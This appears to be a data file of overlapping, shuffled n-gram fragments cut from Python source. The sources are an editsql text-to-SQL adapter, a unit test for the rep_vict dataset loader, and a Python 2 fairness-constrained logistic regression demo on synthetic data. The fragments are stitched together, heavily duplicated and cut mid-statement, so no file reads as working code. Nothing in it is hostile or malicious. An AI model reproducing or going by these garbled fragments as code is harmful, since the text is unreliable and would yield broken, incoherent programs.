create_word_embeddings(input_vocabulary) output_vocabulary_embeddings =", "id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 # fill the content fields example[\"database_id\"]", "comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"] =", "parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create the dataset and model data =", "the editsql translation model Args: params: the parsed arguments data: the ATISDataset Returns:", "atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question, db_id): \"\"\" Translate a single natural language", "return pred_str def post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema)", "prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the", "contains the natural language question and the database id Args: nl_questions: the natural", "list prev_predictions: the previous predictions or an empty list Returns: the sql prediction", "EditsqlAdapter: \"\"\" Uses the functionality of editsql to translate arbitrary questions into sql", "standalone editsql act as the reference. The use_gold_query switch enables comparison with the", "show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output of EditsqlAdapter. By default the prediction", "else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")", "nl_question: the natural language question db_id: the database that acts as context prev_nl_questions:", "nl_question and db_id output_dir: path of dir where the translations are saved \"\"\"", "question and the database id Args: nl_questions: the natural language questions db_id: the", "of an interaction in raw state example = dict() example[\"final\"] = dict() example[\"interaction\"]", "len(references) # determine the instances to test on if randomness: sample_indices = random.sample(range(len(references)),", "comparisons.append(comparison) end = time.time() duration = end - start time_per_item = duration /", "post_process(self, prediction, db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return post_processed #", "for i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content,", "from editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql", "\" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id) gold = \"", "path of dir where the translations are saved \"\"\" edi_adap = EditsqlAdapter() with", "= \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation = self.translate(in_seq, db_id) gold =", "loading function that makes use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema,", "import * from api import setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\"", "= self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question, db_id): \"\"\" Translate", "show_all: write all samples, not only those with errors use_gold_query: comparison with the", "adapters.editsql.constants import * from api import setup_util from api.paths import DB_SCHEMAS_FILE class EditsqlAdapter:", "+ params.save_file) model.eval() return model def prepare_interaction(self, nl_questions, db_id, prev_predictions): \"\"\" Creates an" ]
[ "shutil import sys import tempfile from observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test module", "downloading rep_vict.csv and testing shape of extracted data has 8 rows and 8", "import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv and testing shape", "import tempfile from observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading", "by downloading rep_vict.csv and testing shape of extracted data has 8 rows and", "8 columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert x_train.shape", "division from __future__ import print_function import shutil import sys import tempfile from observations.r.rep_vict", "8 rows and 8 columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path)", "import absolute_import from __future__ import division from __future__ import print_function import shutil import", "rep_vict.csv and testing shape of extracted data has 8 rows and 8 columns", "print_function import shutil import sys import tempfile from observations.r.rep_vict import rep_vict def test_rep_vict():", "def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv and testing shape of extracted", "tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert x_train.shape == (8, 8) except: shutil.rmtree(test_path)", "rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv and testing shape of", "and 8 columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert", "test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert x_train.shape == (8, 8)", "import print_function import shutil import sys import tempfile from observations.r.rep_vict import rep_vict def", "testing shape of extracted data has 8 rows and 8 columns \"\"\" test_path", "tempfile from observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv", "and testing shape of extracted data has 8 rows and 8 columns \"\"\"", "absolute_import from __future__ import division from __future__ import print_function import shutil import sys", "shape of extracted data has 8 rows and 8 columns \"\"\" test_path =", "= tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert x_train.shape == (8, 8) except:", "has 8 rows and 8 columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata =", "<filename>tests/r/test_rep_vict.py from __future__ import absolute_import from __future__ import division from __future__ import print_function", "from __future__ import absolute_import from __future__ import division from __future__ import print_function import", "__future__ import division from __future__ import print_function import shutil import sys import tempfile", "\"\"\"Test module rep_vict.py by downloading rep_vict.csv and testing shape of extracted data has", "__future__ import print_function import shutil import sys import tempfile from observations.r.rep_vict import rep_vict", "rep_vict.py by downloading rep_vict.csv and testing shape of extracted data has 8 rows", "rows and 8 columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try:", "__future__ import absolute_import from __future__ import division from __future__ import print_function import shutil", "test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv and testing shape of extracted data", "from __future__ import division from __future__ import print_function import shutil import sys import", "import sys import tempfile from observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py", "from __future__ import print_function import shutil import sys import tempfile from observations.r.rep_vict import", "import shutil import sys import tempfile from observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test", "\"\"\" test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert x_train.shape == (8,", "columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata = rep_vict(test_path) try: assert x_train.shape ==", "x_train, metadata = rep_vict(test_path) try: assert x_train.shape == (8, 8) except: shutil.rmtree(test_path) raise()", "module rep_vict.py by downloading rep_vict.csv and testing shape of extracted data has 8", "observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv and testing", "sys import tempfile from observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by", "data has 8 rows and 8 columns \"\"\" test_path = tempfile.mkdtemp() x_train, metadata", "extracted data has 8 rows and 8 columns \"\"\" test_path = tempfile.mkdtemp() x_train,", "from observations.r.rep_vict import rep_vict def test_rep_vict(): \"\"\"Test module rep_vict.py by downloading rep_vict.csv and", "import division from __future__ import print_function import shutil import sys import tempfile from", "of extracted data has 8 rows and 8 columns \"\"\" test_path = tempfile.mkdtemp()" ]
[ "validation accuracy as a performance measure def test_synthetic_data(): \"\"\" Generate the synthetic data", "= ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i", "lf # loss funcs that can be optimized subject to various constraints NUM_FOLDS", "between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint,", "print print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now", "apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr =", "optimized subject to various constraints NUM_FOLDS = 10 # we will show 10-fold", "compute the p-rule in the original data \"\"\" Classify the data without any", "as np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the code for fair", "ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in", "['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier ==\"", "accuracy as a performance measure def test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\"", "linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS,", "x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)]) print", "['s1'], [{} for i in range(0,NUM_FOLDS)]) print print \"== Unconstrained (original) classifier ==\"", "the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint,", "x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print", "p-rule in the original data \"\"\" Classify the data without any constraints \"\"\"", "apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print \"== Constrained", "correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff between the fairness and accuracy", "ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in the original data \"\"\" Classify the", "before applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X,", "generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in", "print print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now", "y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)])", "10 # we will show 10-fold cross validation accuracy as a performance measure", "test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints,", "data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule", "Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff", "ut.add_intercept(X) # add intercept to X before applying the linear classifier test_acc_arr, train_acc_arr,", "in range(0,NUM_FOLDS)]) print print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\")", "apply_accuracy_constraint = 0 sep_constraint = 0 loss_function = lf._logistic_loss X = ut.add_intercept(X) #", "test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"],", "x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in the original data", "train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint,", "classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such that we achieve", "plot a tradeoff between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS,", "(fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff between", "X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in the", "as lf # loss funcs that can be optimized subject to various constraints", "lf._logistic_loss X = ut.add_intercept(X) # add intercept to X before applying the linear", "y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)])", "Now plot a tradeoff between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control,", "fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'])", "cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{}", "(original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such that we", "y) # compute the p-rule in the original data \"\"\" Classify the data", "the synthetic data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute", "classification is in this directory import utils as ut import loss_funcs as lf", "any constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint = 0 loss_function", "cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor}", "classify such that we achieve perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor =", "= 10 # we will show 10-fold cross validation accuracy as a performance", "\"\"\" Now classify such that we achieve perfect fairness \"\"\" apply_fairness_constraints = 1", "synthetic data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the", "import os,sys import numpy as np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') #", "NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main(): test_synthetic_data() if __name__ == '__main__':", "achieve perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr,", "= 0 loss_function = lf._logistic_loss X = ut.add_intercept(X) # add intercept to X", "in this directory import utils as ut import loss_funcs as lf # loss", "applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y,", "\"\"\" apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr", "= ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i", "import * sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this", "the code for fair classification is in this directory import utils as ut", "0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function,", "utils as ut import loss_funcs as lf # loss funcs that can be", "# loss funcs that can be optimized subject to various constraints NUM_FOLDS =", "correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint,", "NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print", "data \"\"\" Classify the data without any constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint", "sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory import", "directory import utils as ut import loss_funcs as lf # loss funcs that", "Now classify such that we achieve perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor", "intercept to X before applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr,", "funcs that can be optimized subject to various constraints NUM_FOLDS = 10 #", "= 1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X,", "# add intercept to X before applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr,", "loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)]) print print \"==", "in range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\")", "add intercept to X before applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr,", "show 10-fold cross validation accuracy as a performance measure def test_synthetic_data(): \"\"\" Generate", "sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier", "the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control,", "cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff between the fairness and accuracy \"\"\"", "code for fair classification is in this directory import utils as ut import", "as a performance measure def test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\" X,", "Classify the data without any constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0", "the data without any constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint", "from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the code for fair classification is", "range(0,NUM_FOLDS)]) print print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\"", "\"\"\" Generate the synthetic data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y)", "# the code for fair classification is in this directory import utils as", "ut import loss_funcs as lf # loss funcs that can be optimized subject", "apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint = 0 loss_function = lf._logistic_loss X", "accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main():", "import loss_funcs as lf # loss funcs that can be optimized subject to", "ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such that we achieve perfect fairness", "performance measure def test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\" X, y, x_control", "\"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in", "the original data \"\"\" Classify the data without any constraints \"\"\" apply_fairness_constraints =", "10-fold cross validation accuracy as a performance measure def test_synthetic_data(): \"\"\" Generate the", "y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in the original", "a tradeoff between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function,", "measure def test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\" X, y, x_control =", "\"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main(): test_synthetic_data()", "= ut.add_intercept(X) # add intercept to X before applying the linear classifier test_acc_arr,", "such that we achieve perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor = 0", "perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr,", "classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function,", "range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\"", "can be optimized subject to various constraints NUM_FOLDS = 10 # we will", "i in range(0,NUM_FOLDS)]) print print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr,", "that can be optimized subject to various constraints NUM_FOLDS = 10 # we", "= 0 apply_accuracy_constraint = 0 sep_constraint = 0 loss_function = lf._logistic_loss X =", "generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in the original data \"\"\" Classify", "sep_constraint = 0 loss_function = lf._logistic_loss X = ut.add_intercept(X) # add intercept to", "y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main(): test_synthetic_data() if __name__", "in the original data \"\"\" Classify the data without any constraints \"\"\" apply_fairness_constraints", "<reponame>yashwarlord/fairness-comparison import os,sys import numpy as np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/')", "i in range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr,", "subject to various constraints NUM_FOLDS = 10 # we will show 10-fold cross", "cov_factor = 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control,", "0 loss_function = lf._logistic_loss X = ut.add_intercept(X) # add intercept to X before", "apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print \"== Constrained (fair)", "\"s1\") \"\"\" Now classify such that we achieve perfect fairness \"\"\" apply_fairness_constraints =", "loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main(): test_synthetic_data() if __name__ == '__main__': main()", "[{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr,", "= 0 test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS,", "ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff between the fairness and", "x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def main(): test_synthetic_data() if __name__ ==", "constraints NUM_FOLDS = 10 # we will show 10-fold cross validation accuracy as", "without any constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint = 0", "the p-rule in the original data \"\"\" Classify the data without any constraints", "loss_function = lf._logistic_loss X = ut.add_intercept(X) # add intercept to X before applying", "correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'],", "import numpy as np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the code", "various constraints NUM_FOLDS = 10 # we will show 10-fold cross validation accuracy", "apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)]) print print \"== Unconstrained", "* sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory", "loss funcs that can be optimized subject to various constraints NUM_FOLDS = 10", "original data \"\"\" Classify the data without any constraints \"\"\" apply_fairness_constraints = 0", "that we achieve perfect fairness \"\"\" apply_fairness_constraints = 1 cov_factor = 0 test_acc_arr,", "==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such that we achieve perfect", "be optimized subject to various constraints NUM_FOLDS = 10 # we will show", "fair classification is in this directory import utils as ut import loss_funcs as", "= generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) # compute the p-rule in the original data \"\"\"", "loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)]) print print \"==", "print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify", "NUM_FOLDS = 10 # we will show 10-fold cross validation accuracy as a", "a performance measure def test_synthetic_data(): \"\"\" Generate the synthetic data \"\"\" X, y,", "to X before applying the linear classifier test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr", "\"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such", "for i in range(0,NUM_FOLDS)]) print print \"== Constrained (fair) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr,", "= 0 sep_constraint = 0 loss_function = lf._logistic_loss X = ut.add_intercept(X) # add", "loss_funcs as lf # loss funcs that can be optimized subject to various", "classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff between the", "cross validation accuracy as a performance measure def test_synthetic_data(): \"\"\" Generate the synthetic", "= lf._logistic_loss X = ut.add_intercept(X) # add intercept to X before applying the", "Generate the synthetic data \"\"\" X, y, x_control = generate_synthetic_data(plot_data=False) ut.compute_p_rule(x_control[\"s1\"], y) #", "data without any constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint =", "os,sys import numpy as np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the", "correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such that we achieve perfect fairness \"\"\"", "# compute the p-rule in the original data \"\"\" Classify the data without", "will show 10-fold cross validation accuracy as a performance measure def test_synthetic_data(): \"\"\"", "import utils as ut import loss_funcs as lf # loss funcs that can", "NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)]) print print", "this directory import utils as ut import loss_funcs as lf # loss funcs", "to various constraints NUM_FOLDS = 10 # we will show 10-fold cross validation", "is in this directory import utils as ut import loss_funcs as lf #", "np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the code for fair classification", "==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now plot a tradeoff between the fairness", "X = ut.add_intercept(X) # add intercept to X before applying the linear classifier", "tradeoff between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints,", "constraints \"\"\" apply_fairness_constraints = 0 apply_accuracy_constraint = 0 sep_constraint = 0 loss_function =", "\"\"\" Now plot a tradeoff between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y,", "for i in range(0,NUM_FOLDS)]) print print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr,", "numpy as np from generate_synthetic_data import * sys.path.insert(0, '../../fair_classification/') # the code for", "[{} for i in range(0,NUM_FOLDS)]) print print \"== Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr,", "Unconstrained (original) classifier ==\" ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, \"s1\") \"\"\" Now classify such that", "for fair classification is in this directory import utils as ut import loss_funcs", "cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for", "# we will show 10-fold cross validation accuracy as a performance measure def", "cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for", "and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1']) def", "ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in", "\"s1\") \"\"\" Now plot a tradeoff between the fairness and accuracy \"\"\" ut.plot_cov_thresh_vs_acc_pos_ratio(X,", "0 sep_constraint = 0 loss_function = lf._logistic_loss X = ut.add_intercept(X) # add intercept", "cov_dict_test_arr, \"s1\") \"\"\" Now classify such that we achieve perfect fairness \"\"\" apply_fairness_constraints", 